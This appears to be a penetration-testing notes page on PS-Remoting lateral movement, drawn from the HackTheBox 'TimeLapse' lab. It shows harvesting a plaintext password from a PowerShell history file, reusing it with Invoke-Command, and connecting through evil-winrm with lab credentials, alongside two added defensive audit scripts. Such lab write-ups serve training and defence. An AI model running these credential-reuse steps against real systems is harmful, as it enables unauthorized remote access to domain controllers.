# PS-Remoting

There are two ways in which we can PS-Remote into a system. Usually, after running SharpHound, we can see that some users have this right.

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FWjoIrRmwHqvoUmxTJ1aE%2F2022-07-27_23-43.png?alt=media\&token=b61aef81-03f6-45e2-93ad-ba80f426fb6f)

In the picture above, we can see that both currently owned users are able to PS-Remote into the Domain Controller. This means that with a valid password we can use the following chain of commands to execute code.
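The "CanPSRemote" edge that SharpHound draws is, on the host itself, the combination of an enabled WinRM listener and the permission SDDL on a session configuration (plus membership in the Remote Management Users group). The following audit script is an added example, not code from the original page; it is run elevated on the host being checked (for example the DC) and assumes PowerShell 5.1 or later with the WSMan provider available. `Get-LocalGroupMember` may fail on a domain controller, which is why that call tolerates errors.

```powershell
# Added example (not from the original page): audit who can PS-Remote into this host.
# Assumes an elevated PowerShell 5.1+ session on the host being audited.

function Get-RemotingAudit {
    [CmdletBinding()]
    param()

    # 1. Which WinRM listeners are enabled (HTTP 5985 / HTTPS 5986)?
    $listeners = Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
        $props = Get-ChildItem $_.PSPath
        [pscustomobject]@{
            Transport = ($props | Where-Object Name -eq 'Transport').Value
            Port      = ($props | Where-Object Name -eq 'Port').Value
            Address   = ($props | Where-Object Name -eq 'Address').Value
            Enabled   = ($props | Where-Object Name -eq 'Enabled').Value
        }
    }

    # 2. Which principals are allowed on each session configuration?
    #    The SDDL in Permission is what ultimately grants the remoting right.
    $configs = Get-PSSessionConfiguration | Select-Object Name, Permission

    # 3. Local group that is granted remoting by default (may not exist as a
    #    local group on a domain controller, hence the error handling).
    $rmu = Get-LocalGroupMember -Group 'Remote Management Users' -ErrorAction SilentlyContinue

    [pscustomobject]@{
        Listeners             = $listeners
        SessionConfigurations = $configs
        RemoteManagementUsers = $rmu | Select-Object Name, ObjectClass, PrincipalSource
    }
}

$audit = Get-RemotingAudit
$audit.Listeners             | Format-Table -AutoSize
$audit.SessionConfigurations | Format-Table -AutoSize -Wrap
$audit.RemoteManagementUsers | Format-Table -AutoSize
```

Compare the `Permission` column against what BloodHound shows: any user or group listed there that does not need remote administration is an edge worth removing, and a listener on 5985 with no HTTPS counterpart means credentials cross the wire protected only by Kerberos or NTLM message encryption.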

In the case of TimeLapse we had a PowerShell console history file that gave us the password of a user who was able to PS-Remote into the system.

In the text file we found the following text:

```
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```

So, in theory, if we run the same commands we should be able to execute commands as the user `svc_deploy`.

Chain of commands:
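The root cause here is a secret typed on the command line and persisted by PSReadLine. The script below is an added example, not code from the original page: run as an administrator on a host you manage, it walks every user's `ConsoleHost_history.txt`, flags lines that match common credential-on-the-command-line patterns, and redacts quoted values so the report does not re-leak the secret. The profile root and the regular expressions are assumptions to adjust for your environment.

```powershell
# Added example (not from the original page): find plaintext credentials left in
# PSReadLine history files. Assumes profiles live under C:\Users (adjustable).

function Find-PlaintextCredentialInHistory {
    [CmdletBinding()]
    param(
        # Root under which user profiles live; C:\Users on a default install.
        [string]$ProfileRoot = 'C:\Users'
    )

    # Patterns that typically carry a secret on the command line (assumed set).
    $patterns = @(
        'ConvertTo-SecureString\s+[''"].+?[''"]\s+-AsPlainText',   # $p = ConvertTo-SecureString '...' -AsPlainText
        '-p(ass|assword)?\s+[''"].+?[''"]',                         # -p '...' / -Password '...'
        'net\s+use\s+\S+\s+\S+\s+/user:',                           # net use \\host\share <pw> /user:
        '(Invoke-Command|Enter-PSSession).*-Credential'             # remoting with an explicit credential
    )
    $regex = [regex]::new(($patterns -join '|'), 'IgnoreCase')

    $historyGlob = Join-Path $ProfileRoot '*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    $historyFiles = Get-ChildItem -Path $historyGlob -ErrorAction SilentlyContinue

    foreach ($file in $historyFiles) {
        # Profile directory name directly under $ProfileRoot is the user.
        $user = $file.FullName.Substring($ProfileRoot.Length).TrimStart('\').Split('\')[0]
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $file.FullName) {
            $lineNo++
            if ($regex.IsMatch($line)) {
                # Redact anything in quotes so the report itself does not re-leak the secret.
                $redacted = $line -replace "(['""])[^'""]*\1", '$1<redacted>$1'
                [pscustomobject]@{
                    User    = $user
                    File    = $file.FullName
                    Line    = $lineNo
                    Command = $redacted
                }
            }
        }
    }
}

Find-PlaintextCredentialInHistory | Format-Table -AutoSize -Wrap
```

A hit on the `ConvertTo-SecureString ... -AsPlainText` pattern is exactly the TimeLapse case: the credential should be rotated, and the history file cleared. For accounts that must script remoting, `Get-Credential` or a secret store (for example the SecretManagement module) keeps the password out of the history file in the first place.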

```
*Evil-WinRM* PS C:\Users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
```

Now executing commands via PS-Remoting:

```
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}
dc01
```

### Evil-WinRM

We can use `-S` to connect over SSL (WinRM over HTTPS on port 5986 instead of plain HTTP on 5985).

```
evil-winrm -u 'Administrator' -p '8p4Uc,AC5lJ9E]P9X7#3$10@' -i 10.10.11.152  -S
```

### PowerView

`Enter-PSSession` is a built-in PowerShell cmdlet that opens an interactive session; the account passed to `-Credential` takes the form `domain\user`.

```
Enter-PSSession -ComputerName <computer-name> -Credential domain\user
```
